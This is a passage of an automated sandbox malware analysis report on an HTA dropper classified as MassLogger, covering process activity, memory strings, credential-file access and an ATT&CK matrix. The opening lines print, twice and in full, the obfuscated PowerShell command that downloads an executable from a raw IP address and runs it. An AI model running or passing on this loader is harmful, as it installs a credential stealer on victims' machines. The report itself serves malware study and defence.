Source: C:\Users\user\AppData\Roaming\csso.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C POwErshElL.EXE -EX bYPaSS -nOP -W 1 -c DeVICEcReDeNTIalDEPlOyMENT.eXE ; IEX($(iEx('[SYstEm.TExT.EnCodinG]'+[Char]0x3a+[cHaR]0X3a+'utf8.getstRIng([sYsTeM.cOnvErT]'+[CHaR]58+[cHAR]58+'fRombAsE64sTRINg('+[CHar]0x22+'JDRHb3N6TTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVmSW5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVlyd0xFQWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpzSE9VSGNaZktiLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeHRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhTWVEZENmRWZyKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJIek1ERnJtb2MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW9RY0JEa3hXSyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0R29zek00OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI4LzYwL2Nzc28uZXhlIiwiJGVuVjpBUFBEQVRBXGNzc28uZXhlIiwwLDApO1N0QXJ0LVNsRWVQKDMpO0lOdm9LZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3Nzby5leGUi'+[char]34+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C POwErshElL.EXE -EX bYPaSS -nOP -W 1 -c DeVICEcReDeNTIalDEPlOyMENT.eXE ; IEX($(iEx('[SYstEm.TExT.EnCodinG]'+[Char]0x3a+[cHaR]0X3a+'utf8.getstRIng([sYsTeM.cOnvErT]'+[CHaR]58+[cHAR]58+'fRombAsE64sTRINg('+[CHar]0x22+'JDRHb3N6TTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVmSW5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVlyd0xFQWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpzSE9VSGNaZktiLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeHRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhTWVEZENmRWZyKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJIek1ERnJtb2MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW9RY0JEa3hXSyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0R29zek00OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI4LzYwL2Nzc28uZXhlIiwiJGVuVjpBUFBEQVRBXGNzc28uZXhlIiwwLDApO1N0QXJ0LVNsRWVQKDMpO0lOdm9LZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3Nzby5leGUi'+[char]34+'))')))"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0520175D push E96CB5DCh; iretd	3_2_05201771
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_0006C4FE push A30006BAh; retn 0006h	12_2_0006C50D
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_00088945 push ecx; ret	12_2_00088958
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000AFF02 push edi; retn 000Ah	12_2_000AFF19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012B80A0 push ebx; ret	13_2_012B80A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012B4381 push ds; ret	13_2_012B4382
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012B4429 push ds; ret	13_2_012B442A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012B442C push ds; ret	13_2_012B442E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012B4430 push ds; ret	13_2_012B4432
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012B44AE push ds; ret	13_2_012B44B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012B44B7 push ds; ret	13_2_012B44BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012B4CE0 pushfd ; ret	13_2_012B4CE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D15810 push edx; iretd	13_2_01D1581A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D19C99 push ds; iretd	13_2_01D19C9E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D18440 push ds; iretd	13_2_01D1844E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01D13C44 push eax; ret	13_2_01D13C4D

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		12_2_000648D7
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000E5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		12_2_000E5376

Source: C:\Windows\SysWOW64\mshta.exe	Window / User API: threadDelayed 7364	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7876	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1692	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe TID: 6232	Thread sleep count: 7364 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5660	Thread sleep count: 7876 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5248	Thread sleep count: 1692 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2228	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior

Source: powershell.exe, 00000003.00000002.1335820890.0000000005557000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.1339660920.0000000007C7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: powershell.exe, 00000003.00000002.1339660920.0000000007C7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000003.00000002.1335820890.0000000005557000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: RegSvcs.exe, 0000000D.00000002.2440478887.0000000001429000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
Source: powershell.exe, 00000003.00000002.1341695182.0000000008BCA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1341695182.0000000008BA4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.1335820890.0000000005557000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_01432150 mov eax, dword ptr fs:[00000030h]	12_2_01432150
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_014337A0 mov eax, dword ptr fs:[00000030h]	12_2_014337A0
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_01433800 mov eax, dword ptr fs:[00000030h]	12_2_01433800

Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_0008A124 SetUnhandledExceptionFilter,		12_2_0008A124
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_0008A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		12_2_0008A155

Source: 12.2.csso.exe.3cb0000.1.raw.unpack, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 12.2.csso.exe.3cb0000.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 12.2.csso.exe.3cb0000.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))

Source: csso.exe, 0000000C.00000000.1304574061.0000000000114000.00000002.00000001.01000000.0000000A.sdmp, csso.exe.3.dr, csso[1].exe.3.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: csso.exe	Binary or memory string: Shell_TrayWnd

Source: Yara match	File source: 12.2.csso.exe.3cb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.csso.exe.3cb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.1321194955.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2438663867.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: csso.exe PID: 7504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7532, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Source: csso.exe	Binary or memory string: WIN_81
Source: csso.exe	Binary or memory string: WIN_XP
Source: csso.exe	Binary or memory string: WIN_XPe
Source: csso.exe	Binary or memory string: WIN_VISTA
Source: csso.exe	Binary or memory string: WIN_7
Source: csso.exe	Binary or memory string: WIN_8
Source: csso[1].exe.3.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000D6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		12_2_000D6283
Source: C:\Users\user\AppData\Roaming\csso.exe	Code function: 12_2_000D6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		12_2_000D6747

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report efs.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
efs.hta

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	12 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	11 Command and Scripting Interpreter	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	121 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	11 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	128 System Information Discovery	Distributed Component Object Model	121 Input Capture	23 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 Masquerading	LSA Secrets	131 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement